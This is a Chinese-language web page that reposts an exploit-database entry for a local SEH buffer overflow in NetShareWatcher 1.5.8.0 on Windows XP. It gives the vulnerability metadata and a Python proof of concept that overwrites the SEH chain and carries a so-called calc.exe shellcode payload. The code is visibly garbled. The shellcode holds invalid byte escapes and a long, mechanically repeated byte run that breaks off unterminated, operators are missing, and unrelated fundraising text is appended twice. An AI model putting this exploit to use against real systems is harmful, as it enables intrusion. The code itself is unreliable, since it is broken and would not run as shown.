NetShareWatcher 1.5.8.0 本地SEH缓冲区溢出漏洞POC

漏洞概述 漏洞名称: NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow EDB-ID: 46578 作者: Peyman Forouzandeh 类型: 本地 平台: Windows 日期: 2019-03-20 验证状态: 已验证 影响范围 受影响应用: NetShareWatcher 1.5.8.0 测试版本: 1.5.8.0 测试环境: Windows XP SP2 - SP3 修复方案 当前状态: 未提供具体修复方案，建议用户更新到最新版本或联系软件供应商获取补丁。 POC代码 ```python #!/usr/bin/python buffer = "\x41" 262 nseh = "\xeb\x14\x90\x90" Overwrite Next Seh With Short jmp seh = "\x90\x90\xBF\xC9\x74" Overwrite Seh / pop esi pop ebx retin [OLEACC.dll] nops = "\x90" 20 Calc.exe payload [size 227] buf = "" buf += "\x6b\x1c\xf1\x08\x9c\x27\x17\x1c\x10\x1f\x90\x97\x14\x24\x1f\x41\x5f\x2b\x1c\x9" buf += "\x1a\x33\x31\x14\x47\x17\x18\x83\x1f\x1c\x83\x1x60\x84\x1f\x41\x1x60\x82" buf += "\xc2\x17\x14\x1x60\x13\x1e\x24\x9c\x18\xf1\x22\x30\x1f\x14\x1c\x4\x17\x1x84" buf += "\x1b\x18\x83\x9b\x1f\x1c\x10\x1c\x13\x1f\x1c\x10\x1c\x5\x1f\x14\x1c\x98\x1x84\x17" buf += "\x12\xf1\x1f\x14\x1c\x21\x1f\x1c\x10\x1c\x13\x1f\x1c\x10\x1c\x13\x1f\x14\x1c\x93\x17" buf += "\x1e\x1f\x14\x1c\x10\x1c\x13\x1f\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f\x14\x1c\x10\x1c\x13\x1f

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

NetShareWatcher 1.5.8.0 本地SEH缓冲区溢出漏洞POC

目标达成感谢每一位支持者 — 我们达成了 100% 目标！